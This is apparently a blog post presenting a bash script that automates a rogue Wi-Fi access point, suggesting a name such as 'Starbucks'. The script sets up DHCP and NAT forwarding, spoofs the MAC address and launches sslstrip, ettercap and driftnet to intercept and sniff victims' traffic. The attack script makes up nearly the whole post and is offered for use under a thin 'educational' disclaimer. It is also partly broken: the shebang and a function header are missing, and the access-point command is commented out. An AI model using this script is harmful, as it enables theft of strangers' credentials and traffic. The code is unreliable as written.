Fake-Access Point – Automation
I’ve been playing with creating Fake-Access Points (Rouge Access-Points) in my lab for quite some time now. It was always cumbersome setting this thing up. Below is a .sh script that will do the magic for you. (with a little tweaking) *Note this has only been tested on a Backtrack distro. You can get pretty creative with this script by editing the airbase switches and almost turning this into a jasager – (answering yes to all nearby probes request ~insert evil laugh WOOHAHA~) *Note this is for educational purposes in other words don’t be a jerk with this script. – sorry for the spacing issues
!/bin/bash
# PWN'in Time
#setup dhcp3
intro
echo "Is dhcp3-server already configured [y/n]?"
read DHCP
if [ "$DHCP" = "y" ]; then
echo ""
elif [ "$DHCP" = "n" ]; then
echo "[>] Installing [please wait]..."
apt-get install dhcp3-server -y &>/dev/null
echo "[>] Installation finished"
echo "[>] Backing up dchpd.conf to /etc/dhcp3/dhcpd.conf.backup"
mv /etc/dhcp3/dhcpd.conf /etc/dhcp3/dhcpd.conf.backup
echo "[>] Seting up configuration file"
#write to file
echo "ddns-update-style ad-hoc;
default-lease-time 600;
max-lease-time 7200;
subnet 192.168.2.128 netmask 255.255.255.128 {
option subnet-mask 255.255.255.128;
option broadcast-address 192.168.2.255;
option routers 192.168.2.129;
option domain-name-servers 8.8.8.8;
range 192.168.2.130 192.168.2.140;
}" > /etc/dhcp3/dhcpd.conf
echo "[>] Finished dhcp setup"
read -p "Press [Enter] key to continue..."
else
echo "Please select y or n"
fi
clear
}
function startap {
#interface
clear
intro
echo What is your Fake AP interface [ex.wlan2]:
read FAKEAP
clear
#connected interface
intro
echo What is your interface that is connected to the Internet? [ex:wlan0 or Eth0]:
read REALAP
clear
#ssid
intro
echo SSID of your fake AP [ex.Starbucks]:
read SSID
clear
#channel
intro
echo Channel of your fake AP [1-12]?
read CHANNEL
#checking
clear
intro
echo "Confirm Configuration?"
echo "Fake AP interface: $FAKEAP"
echo "Connected infterface: $REALAP"
echo "SSID: $SSID"
echo "Channel: $CHANNEL"
echo
read -p "Press [Enter] key to continue..."
clear
}
function bypass {
#interface up
intro
echo "[>] Putting interface up"
ifconfig $FAKEAP down
#macchanger -r $FAKEAP
#ifconfig $FAKEAP up
#monitor mode
echo "[>] Putting your interface in monitor mode"
airmon-ng start $FAKEAP &>/dev/null
ifconfig mon0 down
echo "[>] Spoofing Mac Address"
macchanger -r mon0
ifconfig mon0 up
#create ap
echo "[>] Creating new window for creating access point"
#gnome-terminal --title="airbase-ng" -x airbase-ng -e $SSID -c $CHANNEL mon0 &
echo "[*] Fake AP created"
sleep 2
xterm -e "cd /pentest/web/sslstrip/;./sslstrip.py -a -k -f -l" &
echo "[*] SSLSTRIP RUNNING"
sleep 2
echo "[>] Creating new window for EtterCap"
#Change to RealAP or FakeAP?
xterm -e "ettercap -T -q -p -i at0 // //" &
xterm -e "driftnet -v -i at0" &
}
function dhcp {
echo "[>] Setting up dhcp-server"
ifconfig at0 up &&
ifconfig at0 192.168.2.129 netmask 255.255.255.128 &&
route add -net 192.168.2.128 netmask 255.255.255.128 gw 192.168.2.129 &&
dhcpd3 -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcp3-server/dhcpd.pid at0 &>/dev/null &&
/etc/init.d/dhcp3-server start &>/dev/null &&
echo "[>] Setting up /sbin/iptables"
}
function iptables {
/sbin/iptables --flush && /sbin/iptables --table nat --flush && /sbin/iptables --delete-chain && /sbin/iptables --table nat --delete-chain && /sbin/iptables --table nat --append POSTROUTING --out-interface $REALAP -j MASQUERADE && /sbin/iptables --append FORWARD --in-interface at0 -j ACCEPT && echo 1 > /proc/sys/net/ipv4/ip_forward
}
function finished {
echo "[>] Kill EvilAP"
echo "[>] Turning off monitor mode..."
airmon-ng stop mon0 &>/dev/null
echo "[>] Shutting down airbase-ng"
killall airbase-ng
echo "[>] Stoping dchp server"
/etc/init.d/dhcp3-server stop
echo "[*] Ninja Vanish"
exit
}
#Executing here
setup
startap
bypass
sleep 2
dhcp
iptables
read -p "Press [Enter] key to quit..."
finished